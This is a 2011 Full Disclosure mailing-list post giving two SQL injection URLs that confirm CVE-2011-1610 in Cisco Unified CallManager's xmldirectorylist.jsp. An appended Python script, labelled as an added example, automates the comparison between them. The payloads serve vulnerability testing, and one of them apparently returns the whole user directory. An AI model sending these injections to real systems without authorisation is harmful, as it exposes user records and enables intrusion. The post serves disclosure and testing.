Full Disclosure mailing list archives

Re: ZDI-11-143: Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability


From: VSR Advisories <advisories () vsecurity com>
Date: Mon, 2 May 2011 09:44:27 -0700


Hello,

VSR independently discovered this SQL injection flaw (CVE-2011-1610)
and reported it to Cisco on November 11, 2010.  Since we had very
limited time to perform testing on the product, and because Cisco
informed us that another researcher had reported the same flaw shortly
before us, we decided not to write a formal advisory.

However, I would like to add some additional technical information for
those who need to test for this flaw to determine if they are
vulnerable.  

During our tests on version 7.1.3.32900-4 of the product, we found
that SQL query errors generated by attacks cause the vulnerable JSP
script to return no records, but do not present any error message.
To confirm the injection existed, the results from the following two
query URLs were compared:

 /ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--

 /ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--

The first URL returns a very large record set (likely all user
records) while the second query returns no records.  The only
difference between the two is the order in which '0' and '1' appear
in the query, with the latter generating a divide-by-zero error.  It
is likely that a simpler test case can be developed, but this is what
we came up with during very limited testing.  We did not explore
injections on the l and n parameters.

Thank you,
tim

http://www.vsecurity.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
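The comparison the post describes, packaged as a small check script. This is an added example, not code from the original post or from VSR: it sends the two payloads above (identical except for 0/1 versus 1/0) against /ccmcip/xmldirectorylist.jsp and compares the number of records each response contains. It assumes the servlet answers with CiscoIPPhoneDirectory XML whose records are DirectoryEntry elements (an assumption about the response format, not stated in the post), and that an injection is confirmed when the 0/1 variant returns records while the 1/0 variant returns none, since the post notes that a query error yields an empty result rather than an error message. The sample XML and the fake fetcher are constructed so the script runs offline; the hostname cucm.example is a placeholder.

```python
#!/usr/bin/env python3
"""Blind SQL injection check for the xmldirectorylist.jsp 'f' parameter.

Two requests differ only in '0/1' versus '1/0'. If the first returns
records and the second returns none, the arithmetic reached the database
(the 1/0 raised a query error that the JSP swallows into an empty result).
"""
import sys
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

PATH = "/ccmcip/xmldirectorylist.jsp"
# Payloads exactly as given in the post; only the divide order differs.
PAYLOAD_TRUE = "vsr'||0/1 OR 1=1)) --"
PAYLOAD_ERROR = "vsr'||1/0 OR 1=1)) --"


def build_url(base, payload, param="f"):
    """Build the probe URL, encoding only spaces (matches the post's URLs)."""
    encoded = urllib.parse.quote(payload, safe="'|/=()-")
    return base.rstrip("/") + PATH + "?" + param + "=" + encoded


def count_entries(body):
    """Count DirectoryEntry records in a CiscoIPPhoneDirectory response.

    Assumption: the servlet returns that XML format. Anything that does not
    parse (an HTML error page, an empty body) is treated as zero records.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return 0
    return sum(1 for _ in root.iter("DirectoryEntry"))


def http_get(url, timeout=15):
    """Plain GET; CUCM is normally HTTPS, so point this at a trusted cert."""
    req = urllib.request.Request(url, headers={"User-Agent": "cucm-sqli-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def probe(base, fetch=http_get, param="f"):
    """Run both probes and decide. Injectable only if the true-branch
    query returns rows and the divide-by-zero branch returns none; equal
    counts mean the input never reached the SQL engine (inconclusive)."""
    rows_true = count_entries(fetch(build_url(base, PAYLOAD_TRUE, param)))
    rows_error = count_entries(fetch(build_url(base, PAYLOAD_ERROR, param)))
    return {
        "rows_true": rows_true,
        "rows_error": rows_error,
        "injectable": rows_true > 0 and rows_error == 0,
    }


# Constructed sample responses for the offline demonstration (not captured
# from a real system): a populated directory and an empty one.
SAMPLE_TRUE = b"""<CiscoIPPhoneDirectory><Title>Directory</Title>
<DirectoryEntry><Name>Alice Example</Name><Telephone>1001</Telephone></DirectoryEntry>
<DirectoryEntry><Name>Bob Example</Name><Telephone>1002</Telephone></DirectoryEntry>
</CiscoIPPhoneDirectory>"""
SAMPLE_ERROR = b"<CiscoIPPhoneDirectory><Title>Directory</Title></CiscoIPPhoneDirectory>"


def fake_fetch(url):
    """Stand-in for http_get that mimics a vulnerable host offline."""
    return SAMPLE_TRUE if "0/1" in url else SAMPLE_ERROR


if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = probe(sys.argv[1])            # e.g. https://cucm.example
    else:
        result = probe("https://cucm.example", fetch=fake_fetch)
    print(result)
```

The check is deliberately two-sided: a host that returns the same record count for both URLs is not reported as vulnerable, which is the usual false-positive trap with boolean-based blind tests when the parameter is filtered or ignored before it reaches the query.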
